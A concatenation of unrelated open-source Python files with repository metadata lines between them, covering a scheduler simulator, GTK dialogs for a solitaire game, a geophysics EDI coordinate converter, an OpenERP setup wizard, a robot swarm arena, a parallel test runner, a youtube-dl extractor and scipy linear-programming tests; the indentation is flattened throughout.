print '[ time %d ] Run JOB %d at PRIORITY %d [ TICKSLEFT %d RUNTIME %d TIMELEFT %d ]' % (currTime, currJob, currQueue, ticksLeft, runTime, timeLeft)
if timeLeft < 0:
Abort('Error: should never have less than 0 time left to run')
# UPDATE TIME
currTime += 1
# CHECK FOR JOB ENDING
if timeLeft == 0:
print '[ time %d ] FINISHED JOB %d' % (currTime, currJob)
finishedJobs += 1
job[currJob]['endTime'] = currTime
# print 'BEFORE POP', queue
done = queue[currQueue].pop(0)
# print 'AFTER POP', queue
assert(done == currJob)
continue
# CHECK FOR IO
issuedIO = False
if ioFreq > 0 and (((runTime - timeLeft) % ioFreq) == 0):
# time for an IO!
print '[ time %d ] IO_START by JOB %d' % (currTime, currJob)
issuedIO = True
desched = queue[currQueue].pop(0)
assert(desched == currJob)
job[currJob]['doingIO'] = True
# this does the bad rule -- reset your tick counter if you stay at the same level
if options.stay == True:
job[currJob]['ticksLeft'] = quantum[currQueue]
# add to IO Queue: but which queue?
futureTime = currTime + ioTime
if futureTime not in ioDone:
ioDone[futureTime] = []
ioDone[futureTime].append((currJob, 'IO_DONE'))
# print 'NEW IO EVENT at ', futureTime, ' is ', ioDone[futureTime]
# CHECK FOR QUANTUM ENDING AT THIS LEVEL
if ticksLeft == 0:
# print '--> DESCHEDULE %d' % currJob
if issuedIO == False:
# print '--> BUT IO HAS NOT BEEN ISSUED (therefor pop from queue)'
desched = queue[currQueue].pop(0)
assert(desched == currJob)
# move down one queue! (unless lowest queue)
LowerQueue(currJob, currQueue, issuedIO)
# print out statistics
print ''
print 'Final statistics:'
responseSum = 0
turnaroundSum = 0
for i in range(numJobs):
response = job[i]['firstRun'] - job[i]['startTime']
turnaround = job[i]['endTime'] - job[i]['startTime']
print ' Job %2d: startTime %3d - response %3d - turnaround %3d' % (i, job[i]['startTime'],
response, turnaround)
responseSum += response
turnaroundSum += turnaround
print '\n Avg %2d: startTime n/a - response %.2f - turnaround %.2f' % (i,
float(responseSum)/numJobs,
float(turnaroundSum)/numJobs)
print '\n'
| gpl-2.0 | -7,157,397,164,516,865,000 | 36.555215 | 214 | 0.58319 | false |
TrevorLowing/PyGames | pysollib/pysolgtk/tkwidget.py | 2 | 10366 | #!/usr/bin/env python
# -*- mode: python; coding: utf-8; -*-
##---------------------------------------------------------------------------##
##
## Copyright (C) 1998-2003 Markus Franz Xaver Johannes Oberhumer
## Copyright (C) 2003 Mt. Hood Playing Card Co.
## Copyright (C) 2005-2009 Skomoroh
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see <http://www.gnu.org/licenses/>.
##
##---------------------------------------------------------------------------##
# imports
import os, sys
import gtk
gdk = gtk.gdk
# PySol imports
# Toolkit imports
from tkutil import makeToplevel, setTransient, wm_withdraw
from pysollib.mfxutil import kwdefault, KwStruct, openURL
# ************************************************************************
# *
# ************************************************************************
class _MyDialog(gtk.Dialog):
def __init__(self):
gtk.Dialog.__init__(self)
self.connect("destroy", self.quit)
self.connect("delete_event", self.quit)
def __setattr__(self, name, value):
self.__dict__[name] = value
def quit(self, *args):
self.status = 0
self.hide()
self.destroy()
gtk.main_quit()
class MfxDialog(_MyDialog):
img = {}
button_img = {}
def __init__(self, parent, title='',
timeout=0,
resizable=0,
width=-1, height=-1,
text='', justify='center',
strings=("OK",), default=0,
separator=False,
padx=20, pady=20,
bitmap=None, bitmap_side='left',
bitmap_padx=20, bitmap_pady=20,
image=None, image_side='left',
image_padx=10, image_pady=20,
**kw):
_MyDialog.__init__(self)
self.status = 1
self.button = -1
self.buttons = []
modal=True
if modal:
setTransient(self, parent)
# settings
if width > 0 or height > 0:
self.set_size_request(width, height)
#self.window.resize(width, height)
self.set_title(title)
#
self.connect('key-press-event', self._keyPressEvent)
def createBox(self, widget_class=gtk.HBox):
box = widget_class(spacing=5)
box.set_border_width(5)
self.vbox.pack_start(box)
box.show()
return box, self.action_area
createHBox = createBox
def createVBox(self):
return self.createBox(widget_class=gtk.VBox)
def createTable(self):
# FIXME
return self.createBox(widget_class=gtk.Table)
def createBitmaps(self, box, kw):
if kw['bitmap']:
stock = {"info": gtk.STOCK_DIALOG_INFO,
"error": gtk.STOCK_DIALOG_ERROR,
"warning": gtk.STOCK_DIALOG_WARNING,
"question": gtk.STOCK_DIALOG_QUESTION} [kw['bitmap']]
im = gtk.image_new_from_stock(stock, gtk.ICON_SIZE_DIALOG)
box.pack_start(im)
im.set_property('xpad', kw['bitmap_padx'])
im.set_property('ypad', kw['bitmap_pady'])
im.show()
elif kw['image']:
im = gtk.Image()
im.set_from_pixbuf(kw['image'].pixbuf)
if kw['image_side'] == 'left':
box.pack_start(im)
else:
box.pack_end(im)
im.set_property('xpad', kw['image_padx'])
im.set_property('ypad', kw['image_pady'])
im.show()
def createButtons(self, box, kw):
strings, default = kw['strings'], kw['default']
for i in range(len(strings)):
text = strings[i]
if not text:
continue
if isinstance(text, (list, tuple)):
text, index = text
else: # str
index = i
text = text.replace('&', '_')
b = gtk.Button(text)
b.set_property('can-default', True)
if index == default:
b.grab_focus()
#b.grab_default()
b.set_data("user_data", index)
b.connect("clicked", self.done)
box.pack_start(b)
b.show()
self.buttons.append(b)
def initKw(self, kw):
kwdefault(kw,
timeout=0, resizable=0,
text="", justify="center",
strings=(_("&OK"),),
default=0,
width=0,
padx=20, pady=20,
bitmap=None, bitmap_side="left",
bitmap_padx=10, bitmap_pady=20,
image=None, image_side="left",
image_padx=10, image_pady=20,
)
## # default to separator if more than one button
## sw = len(kw.strings) > 1
## kwdefault(kw.__dict__, separator=sw)
return kw
def done(self, button):
self.status = 0
self.button = button.get_data("user_data")
self.quit()
def _keyPressEvent(self, w, e):
if gdk.keyval_name(e.keyval) == 'Escape':
self.quit()
class MfxMessageDialog(MfxDialog):
def __init__(self, parent, title, **kw):
##print 'MfxMessageDialog', kw
kw = self.initKw(kw)
MfxDialog.__init__(self, parent, title, **kw)
top_box, bottom_box = self.createBox()
self.createBitmaps(top_box, kw)
label = gtk.Label(kw['text'])
label.set_justify(gtk.JUSTIFY_CENTER)
label.set_property('xpad', kw['padx'])
label.set_property('ypad', kw['pady'])
top_box.pack_start(label)
self.createButtons(bottom_box, kw)
label.show()
self.set_position(gtk.WIN_POS_CENTER_ON_PARENT)
##self.set_position(gtk.WIN_POS_CENTER)
self.show_all()
gtk.main()
def initKw(self, kw):
#if kw.has_key('bitmap'):
# kwdefault(kw, width=250, height=150)
return MfxDialog.initKw(self, kw)
# ************************************************************************
# *
# ************************************************************************
class PysolAboutDialog(MfxDialog):
def __init__(self, app, parent, title, **kw):
self._url = kw['url']
kw = self.initKw(kw)
MfxDialog.__init__(self, parent, title, **kw)
top_box, bottom_box = self.createBox()
self.createBitmaps(top_box, kw)
box = gtk.VBox()
box.set_property('border-width', 20)
top_box.pack_start(box)
label = gtk.Label(kw['text'])
label.set_justify(gtk.JUSTIFY_CENTER)
box.pack_start(label)
url_label = gtk.Label()
url_label.set_justify(gtk.JUSTIFY_CENTER)
url_label.set_markup(
'<span foreground="blue" underline="single">%s</span>' % kw['url'])
event_box = gtk.EventBox()
box.pack_start(event_box)
event_box.connect('button-press-event', self._urlClicked)
event_box.add(url_label)
self.createButtons(bottom_box, kw)
self.set_position(gtk.WIN_POS_CENTER_ON_PARENT)
##self.set_position(gtk.WIN_POS_CENTER)
self.show_all()
event_box.window.set_cursor(gdk.Cursor(gdk.HAND2))
gtk.main()
def initKw(self, kw):
#if kw.has_key('bitmap'):
# kwdefault(kw, width=250, height=150)
return MfxDialog.initKw(self, kw)
def _urlClicked(self, *args):
openURL(self._url)
# ************************************************************************
# *
# ************************************************************************
class MfxExceptionDialog(MfxDialog):
def __init__(self, parent, ex, title="Error", **kw):
kw = KwStruct(kw, bitmap="error")
text = str(kw.get("text", ""))
if text and text[-1] != "\n":
text = text + "\n"
text = text + "\n"
if isinstance(ex, EnvironmentError) and ex.filename is not None:
t = '[Errno %s] %s:\n%s' % (ex.errno, ex.strerror, repr(ex.filename))
else:
t = str(ex)
kw.text = text + t
MfxDialog.__init__(self, parent, title, **kw.__dict__)
# ************************************************************************
# *
# ************************************************************************
class MfxSimpleEntry(_MyDialog):
def __init__(self, parent, title, label, value, resizable=0, **kw):
_MyDialog.__init__(self)
self.button = 0
self.status = 1
self.value = value
self.init(parent, label, True)
self.entry.set_text(str(value))
self.set_title(title)
self.show()
gtk.main()
def init(self, parent, message="", modal=True):
if modal:
setTransient(self, parent)
box = gtk.VBox(spacing=10)
box.set_border_width(10)
self.vbox.pack_start(box)
box.show()
if message:
label = gtk.Label(message)
box.pack_start(label)
label.show()
self.entry = gtk.Entry()
box.pack_start(self.entry)
self.entry.show()
self.entry.grab_focus()
button = gtk.Button("OK")
button.connect("clicked", self.done)
button.set_flags(gtk.CAN_DEFAULT)
self.action_area.pack_start(button)
button.show()
button.grab_default()
button = gtk.Button("Cancel")
button.connect("clicked", self.quit)
button.set_flags(gtk.CAN_DEFAULT)
self.action_area.pack_start(button)
button.show()
def done(self, button):
self.status = 0
self.value = self.entry.get_text()
self.quit()
class SelectDialogTreeData:
pass
| gpl-2.0 | 8,268,712,616,668,244,000 | 30.035928 | 81 | 0.504438 | false |
geophysics/mtpy | mtpy/utils/convert_coordinates_in_edis.py | 1 | 2530 | #!/usr/bin/env python
"""
mtpy/mtpy/uofa/convert_coordinates_in_edis.py
This is a convenience script for converting coordinates in EDI files.
Files are parsed and if a 'lat' or 'lon' is detected, the argument on
the other side of an '=' is converted into decimal degrees. The rest of the file
remains unchanged.
argument:
- directory containing edi files
optional:
- output directory [default: 'decimal_degrees']
"""
import sys
import os
import os.path as op
import fnmatch
import re
import mtpy.utils.format as MTft
def main():
if len(sys.argv) < 2:
sys.exit('\nNeed at least 1 arguments:\n '
'\n <path to EDI files> \n '
'[optional: <output path>]\n')
edidir = sys.argv[1]
if not op.isdir(edidir):
print 'Given directory does not exist {0}'.format(edidir)
sys.exit()
edilist =[]
try:
edilist = fnmatch.filter(os.listdir(edidir),'*.[Ee][Dd][Ii]')
if len(edilist) == 0:
raise
edilist = [op.abspath(op.join(edidir,i)) for i in edilist]
except:
print 'Given directory does not contain edi files: {0}'.format(edidir)
outputdir = op.join(edidir,'decimal_degrees')
if not op.isdir(outputdir):
os.makedirs(outputdir)
if len(sys.argv) > 2:
outputdir = sys.argv[2]
try:
if not op.isdir(outputdir):
os.makedirs(outputdir)
except:
print 'could not generate output directory - using default'
outputdir = op.join(edidir,'decimal_degrees')
if not op.isdir(outputdir):
os.makedirs(outputdir)
path = convert_edis(edilist,outputdir)
return path
def convert_edis(edilist, output_path):
for edi in edilist:
infile = edi
outfile_raw = os.path.split(edi)[1]
outfile = op.join(output_path, outfile_raw)
outstring =''
with open(infile,'r') as F:
edilines = F.readlines()
for line in edilines:
if not ('lat' in line.lower() or 'lon' in line.lower()):
outstring += line
continue
linelist = line.strip().split('=')
coord = linelist[1]
dec_coord = str(MTft.assert_decimal_coordinates(coord))
outstring += '\t{0}={1}\t\n'.format(linelist[0],dec_coord)
with open(outfile,'w') as Fout:
Fout.write(outstring.expandtabs(4))
if __name__=='__main__':
main()
| gpl-3.0 | 1,244,499,688,286,023,000 | 24.816327 | 81 | 0.580632 | false |
Jgarcia-IAS/SAT | openerp/addons/base_setup/base_setup.py | 382 | 5430 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import simplejson
import cgi
from openerp import tools
from openerp.osv import fields, osv
from openerp.tools.translate import _
from lxml import etree
# Specify Your Terminology will move to 'partner' module
class specify_partner_terminology(osv.osv_memory):
_name = 'base.setup.terminology'
_inherit = 'res.config'
_columns = {
'partner': fields.selection([
('Customer','Customer'),
('Client','Client'),
('Member','Member'),
('Patient','Patient'),
('Partner','Partner'),
('Donor','Donor'),
('Guest','Guest'),
('Tenant','Tenant')
], 'How do you call a Customer', required=True ),
}
_defaults={
'partner' :'Customer',
}
def make_translations(self, cr, uid, ids, name, type, src, value, res_id=0, context=None):
trans_obj = self.pool.get('ir.translation')
user_obj = self.pool.get('res.users')
context_lang = user_obj.browse(cr, uid, uid, context=context).lang
existing_trans_ids = trans_obj.search(cr, uid, [('name','=',name), ('lang','=',context_lang), ('type','=',type), ('src','=',src), ('res_id','=',res_id)])
if existing_trans_ids:
trans_obj.write(cr, uid, existing_trans_ids, {'value': value}, context=context)
else:
create_id = trans_obj.create(cr, uid, {'name': name,'lang': context_lang, 'type': type, 'src': src, 'value': value , 'res_id': res_id}, context=context)
return {}
def execute(self, cr, uid, ids, context=None):
def _case_insensitive_replace(ref_string, src, value):
import re
pattern = re.compile(src, re.IGNORECASE)
return pattern.sub(_(value), _(ref_string))
trans_obj = self.pool.get('ir.translation')
fields_obj = self.pool.get('ir.model.fields')
menu_obj = self.pool.get('ir.ui.menu')
act_window_obj = self.pool.get('ir.actions.act_window')
for o in self.browse(cr, uid, ids, context=context):
#translate label of field
field_ids = fields_obj.search(cr, uid, [('field_description','ilike','Customer')])
for f_id in fields_obj.browse(cr ,uid, field_ids, context=context):
field_ref = f_id.model_id.model + ',' + f_id.name
self.make_translations(cr, uid, ids, field_ref, 'field', f_id.field_description, _case_insensitive_replace(f_id.field_description,'Customer',o.partner), context=context)
#translate help tooltip of field
for obj in self.pool.models.values():
for field_name, field_rec in obj._columns.items():
if field_rec.help.lower().count('customer'):
field_ref = obj._name + ',' + field_name
self.make_translations(cr, uid, ids, field_ref, 'help', field_rec.help, _case_insensitive_replace(field_rec.help,'Customer',o.partner), context=context)
#translate menuitems
menu_ids = menu_obj.search(cr,uid, [('name','ilike','Customer')])
for m_id in menu_obj.browse(cr, uid, menu_ids, context=context):
menu_name = m_id.name
menu_ref = 'ir.ui.menu' + ',' + 'name'
self.make_translations(cr, uid, ids, menu_ref, 'model', menu_name, _case_insensitive_replace(menu_name,'Customer',o.partner), res_id=m_id.id, context=context)
#translate act window name
act_window_ids = act_window_obj.search(cr, uid, [('name','ilike','Customer')])
for act_id in act_window_obj.browse(cr ,uid, act_window_ids, context=context):
act_ref = 'ir.actions.act_window' + ',' + 'name'
self.make_translations(cr, uid, ids, act_ref, 'model', act_id.name, _case_insensitive_replace(act_id.name,'Customer',o.partner), res_id=act_id.id, context=context)
#translate act window tooltips
act_window_ids = act_window_obj.search(cr, uid, [('help','ilike','Customer')])
for act_id in act_window_obj.browse(cr ,uid, act_window_ids, context=context):
act_ref = 'ir.actions.act_window' + ',' + 'help'
self.make_translations(cr, uid, ids, act_ref, 'model', act_id.help, _case_insensitive_replace(act_id.help,'Customer',o.partner), res_id=act_id.id, context=context)
return {}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -1,916,442,078,377,144,600 | 53.848485 | 185 | 0.592081 | false |
beckynaylor/PiSwarmSim | PiSwarmSimulator/arena.py | 1 | 5901 | # Pi-Swarm Simulator is a simple graphical simulation environment for the Pi-Swarm robots
# Copyright (C) 2014 Becky Naylor, Jon Timmis, University of York
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#All arena element classes are in this file
#import external libraries
import os, random, sys, math, itertools, operator, datetime, re, cProfile
from framework import *
#import simulator classes
from robot import *
from proxSensor import *
#Room perimeter polygon, currently there should be just one of these
class Room():
def __init__(self, world, xsize, ysize):
self.xsize = xsize
self.ysize = ysize
#TODO: make centre relative to the screen, not hardcoded
#Centre the room in the screen
self.centrePoint = (0,ysize/2)
self.walls = world.CreateBody(position=self.centrePoint, userData=self)
#List of corner positions to create edges
self.corners = [ (-xsize/2,-ysize/2),
(-xsize/2,ysize/2),
(xsize/2,ysize/2),
(xsize/2,-ysize/2),
(-xsize/2,-ysize/2) ]
#Make vertices
self.walls.CreateEdgeChain(self.corners)
#Arena obstacles, provide the world to add them to. Can also provide a list of protected areas (of type b2body)
class Obstacle:
def __init__(self, world, obstacleid, room, protectedAreaList=0):
self.obstacleid = obstacleid
self.shape = ""
#Pick random size
obs_size = random.uniform(0.5,1.5)
#Dice roll to decide object shape
diceroll = random.randint(0,2)
roomx = room.xsize
roomy = room.ysize
#square
if diceroll == 0:
self.shape = "square"
obs_y_size = obs_size
obstacle=b2PolygonShape(box=(obs_size, obs_size))
self.size = obs_size
#rectangle
elif diceroll == 1:
self.shape = "rectangle"
#generate y side too for rectangle
obs_y_size = random.uniform(0.5,1.5)
obstacle=b2PolygonShape(box=(obs_size, obs_y_size))
self.size = (obs_size, obs_y_size)
#circle
elif diceroll == 2:
self.shape = "circle"
obs_size = obs_size*2
obs_y_size = obs_size
obstacle=b2CircleShape(radius=(obs_size))
self.size = obs_size
positionAccepted = False
while positionAccepted == False:
#Pick random co-ordinates
(xpos, ypos) = (random.uniform(-(float(roomx)/2)+obs_size,(float(roomx)/2)-obs_size), random.uniform(0+obs_y_size,roomy-obs_y_size))
self.fixtures = b2FixtureDef(shape=obstacle, density=1, friction=0.3)
self.body = world.CreateStaticBody(position=(xpos,ypos), fixtures=self.fixtures, userData=self)
#Check there are no protected areas e.g. powersockets at this point
if protectedAreaList != 0:
positionAccepted = True
for protArea in protectedAreaList:
overlapping = b2TestOverlap(self.fixtures.shape, 0, protArea.fixtures.shape, 0, self.body.transform, protArea.body.transform);
#If the shape overlaps a protected area then we need to generate new coordinates
if overlapping == True:
positionAccepted = False
#Destroy old shape before creating a new one
if positionAccepted == False:
world.DestroyBody(self.body)
#Floor area where the robots recharge, specified size (x,y) and position (x,y)
class PowerStrip:
def __init__(self, world, powerid, room, position="none", size="none"):
roomx = room.xsize
roomy = room.ysize
if size == "none":
size = (1.5,1.5)
if position == "none":
#position = ((roomx/2)-size[0],roomy-size[1])
position = (-(roomx/2)+size[0],roomy-size[1])
#with size (3,2) and room (40,40) xpos = -17 and ypos = 2 is bottom left
#with size (3,2) and room (40,40) xpos = -17 and ypos = 38 is top left
#with size (3,2) and room (40,40) xpos = 17 and ypos = 38 is top right
self.powerid = powerid
self.size = size
powerstrip=b2PolygonShape(box=self.size)
self.fixtures = b2FixtureDef(shape=powerstrip, density=0, friction=0, isSensor=True, userData=self)
self.body = world.CreateStaticBody(position=position, fixtures=self.fixtures)
#Floor tile of specified size (x,y) and position (x,y)
class FloorTile:
def __init__(self, world, position, size):
self.contacted = False
#pygame seems to double the expected size, so (4.0,4.0) has 4.0 above centre point and 4.0 below - so halve it.
size = (size[0]/2,size[1]/2)
floortile=b2PolygonShape(box=size)
self.fixtures = b2FixtureDef(shape=floortile, density=0, friction=0, isSensor=True, userData=self)
self.body = world.CreateStaticBody(position=position, fixtures=self.fixtures)
| gpl-3.0 | -4,093,277,932,417,575,400 | 39.979167 | 146 | 0.601423 | false |
hickerson/bbn | fable/fable_sources/libtbx/command_line/run_tests_parallel.py | 1 | 3187 | from __future__ import division
import libtbx.test_utils.parallel
from libtbx.utils import Sorry, Usage
import libtbx.phil
import random
import os
import sys
master_phil = libtbx.phil.parse("""
directory = None
.type = path
.multiple = True
module = None
.type = str
.multiple = True
nproc = 1
.type= int
shuffle = False
.type = bool
quiet = False
.type = bool
run_in_tmp_dir = False
.type = bool
output_junit_xml = False
.type = bool
.help = "Create junit-style xml output"
"Requires junit_xml module:"
" https://pypi.python.org/pypi/junit-xml"
""")
def run (args) :
if (len(args) == 0) :
raise Usage("""libtbx.run_tests_parallel [module=NAME] [directory=path]""")
user_phil = []
for arg in args :
if os.path.isdir(arg) :
user_phil.append(libtbx.phil.parse("directory=%s" % arg))
else :
try :
arg_phil = libtbx.phil.parse(arg)
except RuntimeError :
raise Sorry("Unrecognized argument '%s'" % arg)
else :
user_phil.append(arg_phil)
params = master_phil.fetch(sources=user_phil).extract()
if params.run_in_tmp_dir:
import tempfile
run_dir = tempfile.mkdtemp(suffix='', prefix='cctbxtst')
print 'Running tests in %s' % run_dir
os.chdir(run_dir)
else:
cwd = os.getcwd()
cwd_files = os.listdir(cwd)
if (len(cwd_files) > 0) :
raise Sorry("Please run this program in an empty directory.")
if params.output_junit_xml:
try:
import junit_xml
except ImportError, e:
raise Sorry(
"Cannot import junit_xml. Try running with output_junit_xml=False")
if (len(params.directory) == 0) and (len(params.module) == 0) :
raise Sorry("Please specify modules and/or directories to test.")
all_tests = []
for dir_name in params.directory :
if os.path.split(dir_name)[-1].find("cctbx_project")>-1:
print 'DANGER '*10
print 'Using the directory option in cctbx_project can be very time consuming'
print 'DANGER '*10
dir_tests = libtbx.test_utils.parallel.find_tests(dir_name)
all_tests.extend(libtbx.test_utils.parallel.make_commands(dir_tests))
for module_name in params.module :
module_tests = libtbx.test_utils.parallel.get_module_tests(module_name)
all_tests.extend(module_tests)
if (len(all_tests) == 0) :
raise Sorry("No test scripts found in %s." % params.directory)
if (params.shuffle) :
random.shuffle(all_tests)
if (not params.quiet) :
print "Running the following %d tests on %d processors:" % (len(all_tests),
params.nproc)
for test in all_tests :
print " " + test
log = open("zlog", "wb")
libtbx.test_utils.parallel.run_command_list(
cmd_list=all_tests,
nprocs=params.nproc,
log=log,
quiet=params.quiet,
output_junit_xml=params.output_junit_xml)
log.close()
print """
============================================================================
Reminder: Please do not forget: libtbx.find_clutter
See also: cctbx_project/libtbx/development/dev_guidelines.txt
============================================================================
"""
if (__name__ == "__main__") :
run(sys.argv[1:])
| mit | -7,499,863,496,812,789,000 | 29.352381 | 84 | 0.618764 | false |
Petraea/jsonbot | jsb/utils/pdod.py | 1 | 1417 | # gozerbot/pdod.py
#
#
""" pickled dicts of dicts """
## jsb imports
from jsb.utils.lazydict import LazyDict
from jsb.lib.persist import Persist
## Pdod class
class Pdod(Persist):
""" pickled dicts of dicts """
def __getitem__(self, name):
""" return item with name """
if self.data.has_key(name): return self.data[name]
def __delitem__(self, name):
""" delete name item """
if self.data.has_key(name): return self.data.__delitem__(name)
def __setitem__(self, name, item):
""" set name item """
self.data[name] = item
def __contains__(self, name):
return self.data.__contains__(name)
def setdefault(self, name, default):
""" set default of name """
return self.data.setdefault(name, default)
def has_key(self, name):
""" has name key """
return self.data.has_key(name)
def has_key2(self, name1, najsb):
""" has [name1][najsb] key """
if self.data.has_key(name1): return self.data[name1].has_key(najsb)
def get(self, name1, najsb):
""" get data[name1][najsb] """
try:
result = self.data[name1][najsb]
return result
except KeyError: pass
def set(self, name1, najsb, item):
""" set name, najsb item """
if not self.data.has_key(name1): self.data[name1] = {}
self.data[name1][najsb] = item
| mit | 5,943,566,296,325,826,000 | 24.763636 | 75 | 0.57163 | false |
Nikoli/youtube-dl | youtube_dl/extractor/ultimedia.py | 2 | 3512 | # coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
ExtractorError,
qualities,
unified_strdate,
clean_html,
)
class UltimediaIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.)?ultimedia\.com/default/index/video[^/]+/id/(?P<id>[\d+a-z]+)'
_TESTS = [{
# news
'url': 'https://www.ultimedia.com/default/index/videogeneric/id/s8uk0r',
'md5': '276a0e49de58c7e85d32b057837952a2',
'info_dict': {
'id': 's8uk0r',
'ext': 'mp4',
'title': 'Loi sur la fin de vie: le texte prรฉvoit un renforcement des directives anticipรฉes',
'description': 'md5:3e5c8fd65791487333dda5db8aed32af',
'thumbnail': 're:^https?://.*\.jpg',
'upload_date': '20150317',
},
}, {
# music
'url': 'https://www.ultimedia.com/default/index/videomusic/id/xvpfp8',
'md5': '2ea3513813cf230605c7e2ffe7eca61c',
'info_dict': {
'id': 'xvpfp8',
'ext': 'mp4',
'title': "Two - C'est la vie (Clip)",
'description': 'Two',
'thumbnail': 're:^https?://.*\.jpg',
'upload_date': '20150224',
},
}]
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(url, video_id)
deliver_url = self._search_regex(
r'<iframe[^>]+src="(https?://(?:www\.)?ultimedia\.com/deliver/[^"]+)"',
webpage, 'deliver URL')
deliver_page = self._download_webpage(
deliver_url, video_id, 'Downloading iframe page')
if '>This video is currently not available' in deliver_page:
raise ExtractorError(
'Video %s is currently not available' % video_id, expected=True)
player = self._parse_json(
self._search_regex(
r"jwplayer\('player(?:_temp)?'\)\.setup\(({.+?})\)\.on", deliver_page, 'player'),
video_id)
quality = qualities(['flash', 'html5'])
formats = []
for mode in player['modes']:
video_url = mode.get('config', {}).get('file')
if not video_url:
continue
if re.match(r'https?://www\.youtube\.com/.+?', video_url):
return self.url_result(video_url, 'Youtube')
formats.append({
'url': video_url,
'format_id': mode.get('type'),
'quality': quality(mode.get('type')),
})
self._sort_formats(formats)
thumbnail = player.get('image')
title = clean_html((
self._html_search_regex(
r'(?s)<div\s+id="catArticle">.+?</div>(.+?)</h1>',
webpage, 'title', default=None) or
self._search_regex(
r"var\s+nameVideo\s*=\s*'([^']+)'",
deliver_page, 'title')))
description = clean_html(self._html_search_regex(
r'(?s)<span>Description</span>(.+?)</p>', webpage,
'description', fatal=False))
upload_date = unified_strdate(self._search_regex(
            r'Ajouté le\s*<span>([^<]+)', webpage,
'upload date', fatal=False))
return {
'id': video_id,
'title': title,
'description': description,
'thumbnail': thumbnail,
'upload_date': upload_date,
'formats': formats,
}
| unlicense | 6,590,264,584,309,799,000 | 33.067961 | 105 | 0.509832 | false |
jor-/scipy | scipy/optimize/tests/test_linprog.py | 2 | 69667 | """
Unit test for Linear Programming
"""
from __future__ import division, print_function, absolute_import
import sys
import numpy as np
from numpy.testing import (assert_, assert_allclose, assert_equal,
assert_array_less)
from pytest import raises as assert_raises
from scipy.optimize import linprog, OptimizeWarning
from scipy._lib._numpy_compat import _assert_warns, suppress_warnings
from scipy.sparse.linalg import MatrixRankWarning
from scipy.linalg import LinAlgWarning
import pytest
has_umfpack = True
try:
from scikits.umfpack import UmfpackWarning
except ImportError:
has_umfpack = False
has_cholmod = True
try:
import sksparse
except ImportError:
has_cholmod = False
def _assert_iteration_limit_reached(res, maxiter):
assert_(not res.success, "Incorrectly reported success")
    assert_(res.nit <= maxiter, "Incorrectly reported number of iterations")
assert_equal(res.status, 1, "Failed to report iteration limit reached")
def _assert_infeasible(res):
# res: linprog result object
assert_(not res.success, "incorrectly reported success")
assert_equal(res.status, 2, "failed to report infeasible status")
def _assert_unbounded(res):
# res: linprog result object
assert_(not res.success, "incorrectly reported success")
assert_equal(res.status, 3, "failed to report unbounded status")
def _assert_unable_to_find_basic_feasible_sol(res):
# res: linprog result object
# The status may be either 2 or 4 depending on why the feasible solution
    # could not be found. If the underlying problem is expected to not have a
    # feasible solution, _assert_infeasible should be used.
assert_(not res.success, "incorrectly reported success")
assert_(res.status in (2, 4), "failed to report optimization failure")
def _assert_success(res, desired_fun=None, desired_x=None,
rtol=1e-8, atol=1e-8):
# res: linprog result object
# desired_fun: desired objective function value or None
# desired_x: desired solution or None
if not res.success:
msg = "linprog status {0}, message: {1}".format(res.status,
res.message)
raise AssertionError(msg)
assert_equal(res.status, 0)
if desired_fun is not None:
assert_allclose(res.fun, desired_fun,
err_msg="converged to an unexpected objective value",
rtol=rtol, atol=atol)
if desired_x is not None:
assert_allclose(res.x, desired_x,
err_msg="converged to an unexpected solution",
rtol=rtol, atol=atol)
def magic_square(n):
"""
Generates a linear program for which integer solutions represent an
n x n magic square; binary decision variables represent the presence
(or absence) of an integer 1 to n^2 in each position of the square.
"""
np.random.seed(0)
M = n * (n**2 + 1) / 2
numbers = np.arange(n**4) // n**2 + 1
numbers = numbers.reshape(n**2, n, n)
zeros = np.zeros((n**2, n, n))
A_list = []
b_list = []
# Rule 1: use every number exactly once
for i in range(n**2):
A_row = zeros.copy()
A_row[i, :, :] = 1
A_list.append(A_row.flatten())
b_list.append(1)
# Rule 2: Only one number per square
for i in range(n):
for j in range(n):
A_row = zeros.copy()
A_row[:, i, j] = 1
A_list.append(A_row.flatten())
b_list.append(1)
# Rule 3: sum of rows is M
for i in range(n):
A_row = zeros.copy()
A_row[:, i, :] = numbers[:, i, :]
A_list.append(A_row.flatten())
b_list.append(M)
# Rule 4: sum of columns is M
for i in range(n):
A_row = zeros.copy()
A_row[:, :, i] = numbers[:, :, i]
A_list.append(A_row.flatten())
b_list.append(M)
# Rule 5: sum of diagonals is M
A_row = zeros.copy()
A_row[:, range(n), range(n)] = numbers[:, range(n), range(n)]
A_list.append(A_row.flatten())
b_list.append(M)
A_row = zeros.copy()
A_row[:, range(n), range(-1, -n - 1, -1)] = \
numbers[:, range(n), range(-1, -n - 1, -1)]
A_list.append(A_row.flatten())
b_list.append(M)
A = np.array(np.vstack(A_list), dtype=float)
b = np.array(b_list, dtype=float)
c = np.random.rand(A.shape[1])
return A, b, c, numbers
